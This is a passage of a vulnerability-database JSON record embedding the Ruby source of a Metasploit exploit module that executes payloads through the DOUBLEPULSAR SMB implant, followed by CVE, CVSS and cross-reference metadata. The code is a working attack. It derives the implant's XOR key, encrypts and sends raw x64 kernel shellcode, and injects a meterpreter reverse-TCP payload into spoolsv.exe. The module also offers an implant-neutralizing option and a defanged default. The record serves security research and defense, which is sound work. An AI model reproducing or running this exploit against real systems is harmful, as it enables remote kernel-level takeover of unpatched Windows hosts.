'windows/x64/meterpreter/reverse_tcp'\n }\n ],\n ['Neutralize implant',\n 'DefaultOptions' => {\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_OS_DOWN],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }.freeze\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }.freeze\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack1('V')\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n print_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n print_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n print_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload (x64)'\n unless @xor_key\n fail_with(Failure::NotFound, 'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack('S<')\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/smb_doublepulsar_rce.rb", "title": "SMB DOUBLEPULSAR Remote Code Execution", "type": "metasploit", "viewCount": 101}, "differentElements": ["published", "modified"], "edition": 58, "lastseen": "2020-06-23T07:32:07"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "enchantments": {"dependencies": {"modified": "2020-06-20T22:39:19", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-06-20T22:39:19", "rev": 2, "value": 6.8, "vector": "NONE"}}, "hash": "b5c27edf64ad9e8cc92bd99d726f1c80", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "lastseen": "2020-06-20T22:39:19", "metasploitHistory": "", "metasploitReliability": "", "modified": "2020-02-03T17:19:20", "objectVersion": "1.4", "published": "2020-01-29T19:00:00", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1", "https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/smb_doublepulsar_rce.rb", "title": "SMB DOUBLEPULSAR Remote Code Execution", "type": "metasploit", "viewCount": 96}, "differentElements": ["sourceData"], "edition": 56, "lastseen": "2020-06-20T22:39:19"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "enchantments": {"dependencies": {"modified": "2020-03-28T22:11:20", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2020-03-28T22:11:20", "value": 7.8, "vector": "NONE"}}, "hash": "87ca22fd843673ff2ae5372d0047960d", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "lastseen": "2020-03-28T22:11:20", "metasploitHistory": "", "metasploitReliability": "", "modified": "2020-02-03T17:19:20", "objectVersion": "1.4", "published": "2020-01-29T19:00:00", "references": 